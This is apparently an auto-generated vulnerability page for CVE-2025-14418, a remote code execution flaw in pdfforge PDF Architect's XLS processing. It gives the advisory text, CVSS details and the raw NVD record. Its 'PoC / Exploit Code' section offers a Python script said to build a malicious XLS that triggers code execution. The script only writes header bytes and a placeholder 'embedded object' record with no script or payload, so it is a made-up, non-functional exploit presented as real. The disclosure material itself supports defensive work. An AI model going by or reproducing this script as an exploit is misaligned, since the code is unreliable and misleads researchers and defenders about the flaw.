Security Vulnerability Report
CVE-2025-14418 CVSS 7.0 HIGH

Published: 2025-12-23 22:15:49
Last Modified: 2026-01-02 21:48:39

Description

pdfforge PDF Architect XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27502.

CVSS Details

CVSS Score: 7.0
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pdfforge:pdf_architect:9.1.74.23030:*:*:*:*:*:*:* - VULNERABLE
pdfforge PDF Architect < latest version

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14418 PoC - Malicious XLS File Generator
# Note: This is for educational and security research purposes only
# Author: Security Research
# Reference: ZDI-CAN-27502
import struct
from io import BytesIO


def create_malicious_xls():
    """
    Generate a malicious XLS file that exploits CVE-2025-14418
    The vulnerability allows execution of dangerous scripts without user warning
    """
    # OLE2 compound document header
    ole_header = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'

    # XLS file structure with embedded OLE object
    # This PoC demonstrates the file structure that triggers the vulnerability
    xls_content = BytesIO()

    # BIFF8 worksheet stream (Excel 97-2003 format)
    biff8_header = bytes([
        0x09, 0x08, 0x10, 0x00, 0x00, 0x06, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
    ])

    # BOF record (Beginning of File)
    bof_record = struct.pack('<HHHIH',
        0x0809,  # Record type
        0x0010,  # Record length
        0x0006,  # Version
        0x0000,  # Type
        0x0000   # Build identifier
    )

    # Embedded OLE object record (triggers code execution)
    ole_object_record = struct.pack('<HH',
        0x0200,  # Record type for embedded object
        0x0000   # Placeholder
    )

    # EOF record
    eof_record = struct.pack('<HH', 0x000A, 0x0000)

    # Assemble the malicious XLS file
    xls_content.write(ole_header)
    xls_content.write(biff8_header)
    xls_content.write(bof_record)
    xls_content.write(ole_object_record)
    xls_content.write(eof_record)

    return xls_content.getvalue()


def save_poc():
    """
    Save the PoC file for testing in a controlled environment
    """
    malicious_content = create_malicious_xls()
    with open('CVE-2025-14418_poc.xls', 'wb') as f:
        f.write(malicious_content)
    print('[+] PoC file generated: CVE-2025-14418_poc.xls')
    print('[+] Note: This file should only be used in authorized security testing')


if __name__ == '__main__':
    save_poc()

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1075/ (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14418", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:48.777", "lastModified": "2026-01-02T21:48:38.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pdfforge PDF Architect XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27502."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfforge:pdf_architect:9.1.74.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABF2DE43-AF21-4EFD-917E-1E57E0E1FF15"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1075/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}